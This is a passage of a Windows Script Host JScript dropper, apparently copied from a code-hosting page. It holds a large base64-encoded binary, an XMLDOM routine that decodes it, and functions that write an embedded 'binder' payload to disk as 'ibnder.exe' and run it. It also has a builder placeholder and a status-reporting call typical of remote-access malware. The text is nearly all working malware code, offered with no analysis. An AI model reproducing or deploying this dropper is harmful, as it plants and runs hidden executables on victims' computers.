orAQAGKhMwAgASAAAAEQAAEQADEgD+FQQAABsGgQQAABsAKgAAKgACKCMAAAoAACoAEzACACYAAAASAAARAH4qAAAKjAUAABsU/gELBywKKAIAACuAKgAACn4qAAAKCisABioAACoAAigjAAAKAAAqACIXgAgAAAQAKgAAABswBACHAAAAEwAAEQACjrcZ/gQTBBEELAMAK3UAAoAJAAAEAAIWmgIXmigtAAAKcy4AAAoKBm8vAAAKCygwAAAKcnEAAHACGJpygQAAcCgxAAAKbzIAAAoMBwgWCI63bzMAAAoAB280AAAKAAYU/gYbAAAGcxwAAAYoJwAABgDeDyUoHAAACg0AKCAAAAreAAAAKgABEAAAAAAYAF11AA8gAAABGzAEAH0AAAAUAAARAAB+CQAABBaafgkAAAQXmigtAAAKcy4AAAoKBm8vAAAKCygwAAAKcnEAAHB+CQAABBiacoEAAHAoMQAACm8yAAAKDAcIFgiOt28zAAAKAAdvNAAACgAGFP4GGwAABnMcAAAGKCcAAAYA3g8lKBwAAAoNACggAAAK3gAAACoAAAABEAAAAAACAGlrAA8gAAABEzACADsAAAAVAAARAH4KAAAEFCg2AAAKDAgsIHKLAABw0AoAAAIoFQAACm83AAAKczgAAAoLB4AKAAAEAH4KAAAECisABioAEzABAAsAAAAWAAARAH4LAAAECisABioAJgACgAsAAAQAKgAAWnMkAAAGKDkAAAx0CwAAAoAMAAAEACoAJgIoOgAACgAAKgAAEzABAAsAAAAXAAARAH4MAAAECisABioAEzABAAsAAAAYAAARACglAAAGCisABioAEzACACMAAAAZAAARAAOADQAABBT+Bi4AAAZzPAAACnM9AAAKCgYCbz4AAAoAACoAGzAEAOsCAAAaAAARAAACby8AAAoL3iUlKBwAAAoMAH4NAAAEbx8AAAYAACggAAAK3cACAAAoIAAACt4AAAcoLQAABgoGcrkAAHAWKD8AAAoW/gETGBEYLBgCb0AAAAoAfg0AAARvHwAABgAAOIQCAAAAfg0AAARvHwAABgAGKCkAAAZyuwAAcBYoPwAAChb+ARMYERg5jAAAAAYoLAAABg0ACRaaCReaKC0AAApzLgAAChMEcssAAHATBSgwAAAKEQVvMgAAChMGBxEGFhEGjrdvMwAACgAHbzQAAAoAcy8AAAYTBxEHAgcRBG8wAAAG
var spike= (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmx");
spike.dataType = "bin.base64";
spike.text= encoded;
return spike.nodeTypedValue;
}
function getBinder()
{
var encoded = "[binder]";
if(encoded != "[binder]")
{
var spike =(WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType= "bin.base64";
spike.text = encoded;
return spike.nodeTypedValue;
}
else {return null;}
}
function runBinder()
{
var strsaveto= installdir +"ibnder.exe";
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){objfsodownload.deleteFile(strsaveto);}
try
{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type= 1;
objstreamdownload.Open();
objstreamdownload.Write(getBinder());
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}
catch(err){updatestatus("Access+Denied");}
if(objfsodownload.fileExists(strsaveto)){shellobj.run("\""+ strsaveto+ "\"");}
}
Reference in New Issue Copy Permalink